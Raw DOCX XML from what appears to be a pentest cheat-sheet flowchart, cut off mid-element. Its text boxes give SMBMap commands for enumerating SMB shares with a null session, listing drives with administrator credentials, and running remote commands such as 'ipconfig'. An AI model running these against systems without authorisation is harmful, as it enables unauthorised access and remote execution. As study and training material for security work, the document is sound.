                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;651053,0;434038,197508;197508,197508;197508,412776;0,592531;0,0" o:connectangles="0,0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="008D602E" w:rsidP="00D16CA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5F0C0B" wp14:editId="375DF78F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>476250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>164465</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="403860" cy="503555"/>
                <wp:effectExtent l="19050" t="0" r="34290" b="29845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03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7178" id="Down Arrow 58" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:37.5pt;margin-top:12.95pt;width:31.8pt;height:39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eDdgIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFFP2zAQfp+0/2D5fSQtDWMVKapATJMQ&#10;Q4OJZ+PYJJLt885u0+7X7+ykAQHaw7Q+pLbv7ru7z9/57HxnDdsqDB24ms+OSs6Uk9B07qnmP++v&#10;Pp1yFqJwjTDgVM33KvDz1ccPZ71fqjm0YBqFjEBcWPa+5m2MflkUQbbKinAEXjkyakArIm3xqWhQ&#10;9IRuTTEvy5OiB2w8glQh0OnlYOSrjK+1kvG71kFFZmpOtcX8xfx9TN9idSaWTyh828mxDPEPVVjR&#10;OUo6QV2KKNgGuzdQtpMIAXQ8kmAL0LqTKvdA3czKV93ctcKr3AuRE/xEU/h/sPJme4usa2pe0U05&#10;YemOLqF3bI0IPaNDYqj3YUmOd/4Wx12gZWp3p9Gmf2qE7TKr+4lVtYtM0uGiPD49Ie4lmaryuKqq&#10;hFk8B3sM8asCy9Ki5g2lz9kzoWJ7HeLgf/Cj4FTRUENexb1RqQzjfihN3VDWeY7OOlIXBtlWkAKE&#10;lMrF2WBqRaOG46qk31jUFJFLzIAJWXfGTNgjQNLoW+yh1tE/haoswym4/FthQ/AUkTODi1Ow7Rzg&#10;ewCGuhozD/4HkgZqEkuP0OzprhGGIQheXnVE+LUI8VYgqZ7uiCY5fqePNtDXHMYVZy3g7/fOkz+J&#10;kayc9TRFNQ+/NgIVZ+abI5l+mS0WaezyZlF9ntMGX1oeX1rcxl4AXdOM3gwv8zL5R3NYagT7QAO/&#10;TlnJJJyk3DWXEQ+bizhMNz0ZUq3X2Y1GzYt47e68TOCJ1aSl+92DQD+qLpJcb+AwcWL5SneDb4p0&#10;sN5E0F0W5TOvI980plk445OS3oGX++z1/PCt/gAAAP//AwBQSwMEFAAGAAgAAAAhACwLntzeAAAA&#10;CQEAAA8AAABkcnMvZG93bnJldi54bWxMj8FuwjAQRO+V+AdrkbhU4OAqhKRxUIVK1GtpxdnE2yQi&#10;XqexCenf15za26xmNfMm302mYyMOrrUkYb2KgCFVVrdUS/j8OCy3wJxXpFVnCSX8oINdMXvIVabt&#10;jd5xPPqahRBymZLQeN9nnLuqQaPcyvZIwfuyg1E+nEPN9aBuIdx0XETRhhvVUmhoVI/7BqvL8Wok&#10;2ENZJpc0GdNY0Jspv0+P61ch5WI+vTwD8zj5v2e44wd0KALT2V5JO9ZJSOIwxUsQcQrs7j9tN8DO&#10;QUSxAF7k/P+C4hcAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAA&#10;AAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDtdreDdgIAAEAFAAAOAAAA&#10;AAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAsC57c3gAAAAkBAAAP&#10;AAAAAAAAAAAAAAAAANAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" adj="12938" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D16CAE" w:rsidRPr="00D16CAE" w:rsidRDefault="008D602E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9EF830" wp14:editId="55A3FE09">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1375334</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>233603</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4619767" cy="1262418"/>
                <wp:effectExtent l="0" t="0" r="28575" b="139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767" cy="126241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CAE" w:rsidRDefault="00D16CAE" w:rsidP="00C70606">
                            <w:r w:rsidRPr="00D16CAE">
                              <w:t>smbmap -u username -p "" -d . -H IP_addr</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00C70606" w:rsidRDefault="00C70606" w:rsidP="00C70606">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t>&gt;&gt; Shows Permissions with a null password</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00C70606" w:rsidRDefault="00C70606" w:rsidP="00C70606">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve"> &gt;&gt; d = directory to see</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00C70606" w:rsidRDefault="00C70606" w:rsidP="00C70606">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve"> &gt;&gt; H = Host IP address</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00C70606" w:rsidRDefault="00C70606" w:rsidP="00D16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EF830" id="Rounded Rectangle 25" o:spid="_x0000_s1057" style="position:absolute;margin-left:108.3pt;margin-top:18.4pt;width:363.75pt;height:9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LhcgIAADkFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0iTlQIVKapATJMQ&#10;IGDi2XXsNprj885uk+6v39lJA2JIm6a9JD7f7+++8/lF1xi2U+hrsCXPjyacKSuhqu265N+erj+d&#10;cuaDsJUwYFXJ98rzi8XHD+etm6sCNmAqhYyCWD9vXck3Ibh5lnm5UY3wR+CUJaUGbEQgEddZhaKl&#10;6I3JislklrWAlUOQynu6veqVfJHia61kuNPaq8BMyam2kL6Yvqv4zRbnYr5G4Ta1HMoQ/1BFI2pL&#10;ScdQVyIItsX6t1BNLRE86HAkoclA61qq1AN1k0/edPO4EU6lXggc70aY/P8LK29398jqquTFMWdW&#10;NDSjB9jaSlXsgdATdm0UIx0B1To/J/tHd4+D5OkYu+40NvFP/bAugbsfwVVdYJIup7P87GR2wpkk&#10;XV7Miml+GqNmL+4OffiioGHxUHKMdcQiErJid+NDb3+wI+dYU19FOoW9UbEQYx+UprYob568E6HU&#10;pUG2E0QFIaWyIXVF+ZN1dNO1MaNj8WfHwT66qkS20fkvso4eKTPYMDo3tQV8L3v1PR8g0739AYG+&#10;7whB6FZdmufnZBqvVlDtacgIPfu9k9c1AXwjfLgXSHSnxaAVDnf00QbaksNw4mwD+PO9+2hPLCQt&#10;Zy2tT8n9j61AxZn5aomfZ/l0GvctCdPjk4IEfK1ZvdbYbXMJNJacHgsn0zHaB3M4aoTmmTZ9GbOS&#10;SlhJuUsuAx6Ey9CvNb0VUi2XyYx2zIlwYx+dPBAhcuepexboBpYFIugtHFZNzN/wrLeNI7Kw3AbQ&#10;dSLhC67DCGg/E5eHtyQ+AK/lZPXy4i1+AQAA//8DAFBLAwQUAAYACAAAACEAHkM2fd0AAAAKAQAA&#10;DwAAAGRycy9kb3ducmV2LnhtbEyPy07DMBBF90j8gzVI7KiTNBgIcSqKYMGSwge48TSJGo+j2HnA&#10;1zOsYDm6R3fOLXer68WMY+g8aUg3CQik2tuOGg2fH6839yBCNGRN7wk1fGGAXXV5UZrC+oXecT7E&#10;RnAJhcJoaGMcCilD3aIzYeMHJM5OfnQm8jk20o5m4XLXyyxJlHSmI/7QmgGfW6zPh8lpeLH7k307&#10;03S3d2H4XvLMJHOm9fXV+vQIIuIa/2D41Wd1qNjp6CeyQfQaslQpRjVsFU9g4CHPUxBHTra3CmRV&#10;yv8Tqh8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEASI7C4XICAAA5BQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAHkM2fd0AAAAKAQAADwAAAAAA&#10;AAAAAAAAAADM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16CAE" w:rsidRDefault="00D16CAE" w:rsidP="00C70606">
                      <w:r w:rsidRPr="00D16CAE">
                        <w:t>smbmap -u username -p "" -d . -H IP_addr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00C70606" w:rsidRDefault="00C70606" w:rsidP="00C70606">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t>&gt;&gt; Shows Permissions with a null password</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00C70606" w:rsidRDefault="00C70606" w:rsidP="00C70606">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve"> &gt;&gt; d = directory to see</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00C70606" w:rsidRDefault="00C70606" w:rsidP="00C70606">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve"> &gt;&gt; H = Host IP address</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00C70606" w:rsidRDefault="00C70606" w:rsidP="00D16C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16CAE" w:rsidRPr="00D16CAE" w:rsidRDefault="00C70606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174625</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1043940" cy="975360"/>
                <wp:effectExtent l="0" t="0" r="2286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B3F" w:rsidRDefault="00476B3F" w:rsidP="00476B3F">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00D16CAE">
                              <w:t>SMBMap with Null Session</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00476B3F" w:rsidRDefault="00476B3F" w:rsidP="00476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8" style="position:absolute;margin-left:14.65pt;margin-top:13.75pt;width:82.2pt;height:7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ZfwIAAEwFAAAOAAAAZHJzL2Uyb0RvYy54bWysVFFv2yAQfp+0/4B4X+2kSbtGcaqoVadJ&#10;VVu1nfpMMMRIwDEgsbNfvwM7brVWe5jmB8xxd99x392xvOyMJnvhgwJb0clJSYmwHGpltxX98Xzz&#10;5SslITJbMw1WVPQgAr1cff60bN1CTKEBXQtPEMSGResq2sToFkUReCMMCyfghEWlBG9YRNFvi9qz&#10;FtGNLqZleVa04GvngYsQ8PS6V9JVxpdS8HgvZRCR6Iri3WJefV43aS1WS7bYeuYaxYdrsH+4hWHK&#10;YtAR6ppFRnZevYMyinsIIOMJB1OAlIqLnANmMyn/yOapYU7kXJCc4Eaawv+D5Xf7B09UXdH5OSWW&#10;GazR/Z5pgiJy07qwQJMn9+AHKeA2JdpJb9IfUyBd5vMw8im6SDgeTsrZ6cUMaeeouzifn55lwotX&#10;b+dD/CbAkLSpqNBauZBSZgu2vw0Rg6L10QqFdKH+CnkXD1okY20fhcQ0MOg0e+cGElfaE0ymooxz&#10;YeOkVzWsFv3xvMQv5YlBRo8sZcCELJXWI/YAkJrzPXYPM9gnV5H7b3Qu/3ax3nn0yJHBxtHZKAv+&#10;IwCNWQ2Re/sjST01iaXYbbpc4tPpsaYbqA9Ydw/9QATHbxRW4JaF+MA8TgAWDac63uMiNbQVhWFH&#10;SQP+10fnyR4bE7WUtDhRFQ0/d8wLSvR3iy17MZmlXohZmM3Ppyj4t5rNW43dmSvAyk3w/XA8b5N9&#10;1Met9GBecPjXKSqqmOUYu6I8+qNwFftJx+eDi/U6m+HYORZv7ZPjCTwRndrruXth3g1tGLGB7+A4&#10;fe9asbdNnhbWuwhS5T5NVPe8DiXAkc29NDwv6U14K2er10dw9RsAAP//AwBQSwMEFAAGAAgAAAAh&#10;APCLErvfAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FPg0AQhe8m/ofNmHizC61aQJbGmJCo&#10;iQcR71t2BFJ2lrBLi/56pyc9zUzey5vv5bvFDuKIk+8dKYhXEQikxpmeWgX1R3mTgPBBk9GDI1Tw&#10;jR52xeVFrjPjTvSOxyq0gkPIZ1pBF8KYSembDq32KzcisfblJqsDn1MrzaRPHG4HuY6ie2l1T/yh&#10;0yM+ddgcqtkq+Hku6z7MaZVE9evh7faldLL/VOr6anl8ABFwCX9mOOMzOhTMtHczGS8GBet0w06e&#10;2zsQZz3dbEHseUniGGSRy/8Nil8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YA&#10;AACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdzzjmX8C&#10;AABMBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA8IsS&#10;u98AAAAJ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76B3F" w:rsidRDefault="00476B3F" w:rsidP="00476B3F">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00D16CAE">
                        <w:t>SMBMap with Null Session</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00476B3F" w:rsidRDefault="00476B3F" w:rsidP="00476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16CAE" w:rsidRDefault="00D16CAE" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="00D16CAE" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00D16CAE" w:rsidRPr="00D16CAE" w:rsidRDefault="00D16CAE" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00D16CAE" w:rsidRPr="00D16CAE" w:rsidRDefault="00D16CAE" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="00D16CAE" w:rsidP="00D16CAE"/>
    <w:p w:rsidR="00D16CAE" w:rsidRDefault="008D602E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BFE964" wp14:editId="36695AF3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1455445</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>17374</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3394253" cy="607161"/>
                <wp:effectExtent l="0" t="0" r="15875" b="2159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253" cy="60716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06" w:rsidRDefault="00C70606" w:rsidP="00E67F88">
                            <w:r>
                              <w:t xml:space="preserve">smbmap -u administrator -p password -H IP_addr </w:t>
                            </w:r>
                            <w:r w:rsidR="00D628B3">
                              <w:t>–</w:t>
                            </w:r>
                            <w:r>
                              <w:t>L</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00D628B3" w:rsidRDefault="004A29C7" w:rsidP="00D628B3">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">&gt;&gt; </w:t>
                            </w:r>
                            <w:r w:rsidR="00D628B3">
                              <w:t>-L = List of the contents of different drives</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00D628B3" w:rsidRDefault="00D628B3" w:rsidP="00D16CAE">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="00D628B3" w:rsidRDefault="00D628B3" w:rsidP="00D16CAE">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                          </w:p>
                          <w:p w:rsidR="00D628B3" w:rsidRDefault="00D628B3" w:rsidP="00D16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FE964" id="Rounded Rectangle 60" o:spid="_x0000_s1059" style="position:absolute;margin-left:114.6pt;margin-top:1.35pt;width:267.25pt;height:47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6ucQIAADgFAAAOAAAAZHJzL2Uyb0RvYy54bWysVNtqGzEQfS/0H4Te6/XajtOYrINxSCmE&#10;xCQpeZa1kr1U0qiS7F336zvSXhLSQEvpi1azcz9zRpdXjVbkKJyvwBQ0H40pEYZDWZldQb893Xz6&#10;TIkPzJRMgREFPQlPr5YfP1zWdiEmsAdVCkcwiPGL2hZ0H4JdZJnne6GZH4EVBpUSnGYBRbfLSsdq&#10;jK5VNhmP51kNrrQOuPAe/163SrpM8aUUPNxL6UUgqqBYW0inS+c2ntnyki12jtl9xbsy2D9UoVll&#10;MOkQ6poFRg6u+i2UrrgDDzKMOOgMpKy4SD1gN/n4TTePe2ZF6gXB8XaAyf+/sPzuuHGkKgs6R3gM&#10;0zijBziYUpTkAdFjZqcEQR0CVVu/QPtHu3Gd5PEau26k0/GL/ZAmgXsawBVNIBx/TqcXs8nZlBKO&#10;uvn4PJ/nMWj24m2dD18EaBIvBXWxjFhDApYdb31o7Xs7dI4ltUWkWzgpEetQ5kFI7ArT5sk78Ums&#10;lSNHhkxgnAsTzrr8yTq6yUqpwXHyZ8fOPrqKxLXB+S+yDh4pM5gwOOvKgHsve/m9h0y29j0Cbd8R&#10;gtBsmzTO6bQf2RbKE87YQUt+b/lNhQDfMh82zCHbcfC4weEeD6mgLih0N0r24H6+9z/aIwlRS0mN&#10;21NQ/+PAnKBEfTVIz4t8NovrloTZ2fkEBfdas32tMQe9BhxLjm+F5eka7YPqr9KBfsZFX8WsqGKG&#10;Y+6C8uB6YR3arcangovVKpnhilkWbs2j5T0RIneemmfmbMeygPy8g37T2OINz1rbOCIDq0MAWSUS&#10;RqhbXLsR4HomLndPSdz/13Kyennwlr8AAAD//wMAUEsDBBQABgAIAAAAIQBL4Yby2wAAAAgBAAAP&#10;AAAAZHJzL2Rvd25yZXYueG1sTI/NTsMwEITvSH0Hayv1Rh1c1LQhTkURHDhSeIBt7CZR43UUOz/l&#10;6VlOcJvVjGa/yQ+za8Vo+9B40vCwTkBYKr1pqNLw9fl2vwMRIpLB1pPVcLMBDsXiLsfM+Ik+7HiK&#10;leASChlqqGPsMilDWVuHYe07S+xdfO8w8tlX0vQ4cblrpUqSrXTYEH+osbMvtS2vp8FpeDXHi3m/&#10;0pAeXei+p0eFyai0Xi3n5ycQ0c7xLwy/+IwOBTOd/UAmiFaDUnvFURYpCPbT7YbFWcN+twFZ5PL/&#10;gOIHAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtD&#10;b250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAA&#10;AAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAG13OrnECAAA4BQAADgAAAAAAAAAAAAAA&#10;AAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAS+GG8tsAAAAIAQAADwAAAAAAAAAA&#10;AAAAAADL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70606" w:rsidRDefault="00C70606" w:rsidP="00E67F88">
                      <w:r>
                        <w:t xml:space="preserve">smbmap -u administrator -p password -H IP_addr </w:t>
                      </w:r>
                      <w:r w:rsidR="00D628B3">
                        <w:t>–</w:t>
                      </w:r>
                      <w:r>
                        <w:t>L</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00D628B3" w:rsidRDefault="004A29C7" w:rsidP="00D628B3">
                      <w:pPr>
                        <w:jc w:val="right"/>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">&gt;&gt; </w:t>
                      </w:r>
                      <w:r w:rsidR="00D628B3">
                        <w:t>-L = List of the contents of different drives</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00D628B3" w:rsidRDefault="00D628B3" w:rsidP="00D16CAE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="00D628B3" w:rsidRDefault="00D628B3" w:rsidP="00D16CAE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                    </w:p>
                    <w:p w:rsidR="00D628B3" w:rsidRDefault="00D628B3" w:rsidP="00D16C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628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EEF14D" wp14:editId="13ABE3DA">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>422910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>14249</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="457200" cy="497205"/>
                <wp:effectExtent l="19050" t="0" r="38100" b="36195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7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9D06" id="Down Arrow 65" o:spid="_x0000_s1026" type="#_x0000_t67" style="position:absolute;margin-left:33.3pt;margin-top:1.1pt;width:36pt;height:39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HtdAIAAEAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X50EabcGdYogQYcB&#10;QVu0HXpWZSk2IIkapcTJfv0o2XGKtthhWA4OKZKPH3rU1fXeGrZTGBpwJR+fjThTTkLVuE3Jfz7d&#10;fPnGWYjCVcKAUyU/qMCv558/XbV+piZQg6kUMgJxYdb6ktcx+llRBFkrK8IZeOXIqAGtiKTipqhQ&#10;tIRuTTEZjS6KFrDyCFKFQKerzsjnGV9rJeOd1kFFZkpOtcX8xfx9Sd9ifiVmGxS+bmRfhviHKqxo&#10;HCUdoFYiCrbF5h2UbSRCAB3PJNgCtG6kyj1QN+PRm24ea+FV7oWGE/wwpvD/YOXt7h5ZU5X84pwz&#10;Jyzd0QpaxxaI0DI6pAm1PszI8dHfY68FElO7e402/VMjbJ+nehimqvaRSTqcnn+lm+JMkml6SXLG&#10;LE7BHkP8rsCyJJS8ovQ5ex6o2K1DpKzkf/QjJVXU1ZCleDAqlWHcg9LUDWWd5OjMI7U0yHaCGCCk&#10;VC6OO1MtKtUdn4/olxqlJENE1jJgQtaNMQN2D5A4+h67g+n9U6jKNByCR38rrAseInJmcHEIto0D&#10;/AjAUFd95s7/OKRuNGlKL1Ad6K4RuiUIXt40NPC1CPFeILGe7og2Od7RRxtoSw69xFkN+Puj8+RP&#10;ZCQrZy1tUcnDr61AxZn54Yiml+PpNK1dVjIROMPXlpfXFre1S6BrGtOb4WUWKRijOYoawT7Twi9S&#10;VjIJJyl3yWXEo7KM3XbTkyHVYpHdaNW8iGv36GUCT1NNXHraPwv0Pesi0fUWjhsnZm941/mmSAeL&#10;bQTdZFKe5trPm9Y0E6d/UtI78FrPXqeHb/4HAAD//wMAUEsDBBQABgAIAAAAIQBkPav12wAAAAcB&#10;AAAPAAAAZHJzL2Rvd25yZXYueG1sTI7BTsMwEETvSPyDtUjcqE0qopBmUyHUXhA9ULhwc+NtEjVe&#10;h9hNwt/jnuhxNKM3r1jPthMjDb51jPC4UCCIK2darhG+PrcPGQgfNBvdOSaEX/KwLm9vCp0bN/EH&#10;jftQiwhhn2uEJoQ+l9JXDVntF64njt3RDVaHGIdamkFPEW47mSiVSqtbjg+N7um1oeq0P1uEaTdr&#10;+b15bjdb9Z4sT+5tl4w/iPd388sKRKA5/I/hoh/VoYxOB3dm40WHkKZpXCIkCYhLvcxiPiBk6glk&#10;Wchr//IPAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAHcmx7XQCAABABQAADgAAAAAAAAAA&#10;AAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAZD2r9dsAAAAHAQAADwAAAAAA&#10;AAAAAAAAAADOBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAANYFAAAAAA==&#10;" adj="11669" fillcolor="#5b9bd5 [3204]" strokecolor="#1f4d78 [1604]" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C70606" w:rsidRDefault="008D602E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D38119" wp14:editId="3B0C891A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>54356</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>275895</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1207770" cy="1111885"/>
                <wp:effectExtent l="0" t="0" r="11430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111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606" w:rsidRDefault="00C70606" w:rsidP="00476B3F">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00C70606">
                              <w:t>SMBMap with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38119" id="Oval 59" o:spid="_x0000_s1060" style="position:absolute;margin-left:4.3pt;margin-top:21.7pt;width:95.1pt;height:87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NLewIAAE0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HFGiWUG&#10;e3S3Z5ogi7XpXFihyoO79yMXkEyJ9tKb9McUSJ/reZjqKfpIOF5Ws3K5XGLZOcoq/E5PFwm1eDF3&#10;PsSvAgxJRE2F1sqFlDNbsf1NiIP2UQtNU0RDDJmKBy2SsrbfhcQ80OssW+cJEpfaE8ympoxzYWM1&#10;iFrWiOF6UeI3hjRZ5AAzYEKWSusJewRI0/kWe4h11E+mIg/gZFz+LbDBeLLInsHGydgoC/49AI1Z&#10;jZ4H/WORhtKkKsV+2+cef54n1XS1heaAjfcwbERw/FphB25YiPfM4wpg13Ct4x0eUkNXUxgpSlrw&#10;v967T/o4mSilpMOVqmn4uWNeUKK/WZzZs2o+TzuYmfliOUPGv5ZsX0vszlwCdq7CB8TxTCb9qI+k&#10;9GCecPs3ySuKmOXou6Y8+iNzGYdVx/eDi80mq+HeORZv7IPjCTwVOo3XY//EvBvHMOIE38Jx/d6M&#10;4qCbLC1sdhGkynP6UtexBbizeZbG9yU9Cq/5rPXyCq5/AwAA//8DAFBLAwQUAAYACAAAACEArT9H&#10;Ht4AAAAIAQAADwAAAGRycy9kb3ducmV2LnhtbEyPwU7DMBBE70j8g7WVuFGnJVRuyKZCSJEAiQMh&#10;3N14m1iN7Sh22sDX457ocTSjmTf5bjY9O9HotbMIq2UCjGzjlLYtQv1V3gtgPkirZO8sIfyQh11x&#10;e5PLTLmz/aRTFVoWS6zPJEIXwpBx7puOjPRLN5CN3sGNRoYox5arUZ5juen5Okk23Eht40InB3rp&#10;qDlWk0H4fS1rHaZtJZL6/fiRvpWO62/Eu8X8/AQs0Bz+w3DBj+hQRKa9m6zyrEcQmxhESB9SYBd7&#10;K+KTPcJ6JR6BFzm/PlD8AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEA&#10;AAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAF28M0t7AgAATQUA&#10;AA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAK0/Rx7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70606" w:rsidRDefault="00C70606" w:rsidP="00476B3F">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00C70606">
                        <w:t>SMBMap with Credentials</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C70606" w:rsidRDefault="00D628B3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6A9293" wp14:editId="2785E6E6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1453261</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>97511</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3848555" cy="599847"/>
                <wp:effectExtent l="0" t="0" r="19050" b="1016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555" cy="5998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06" w:rsidRDefault="00C70606" w:rsidP="00D16CAE">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>smbmap -u administrator -p password -H IP_addr -x "ipconfig"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00D628B3" w:rsidRDefault="004A29C7" w:rsidP="00D628B3">
                            <w:pPr>
                              <w:jc w:val="right"/>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">&gt;&gt; </w:t>
                            </w:r>
                            <w:r w:rsidR="00D628B3">
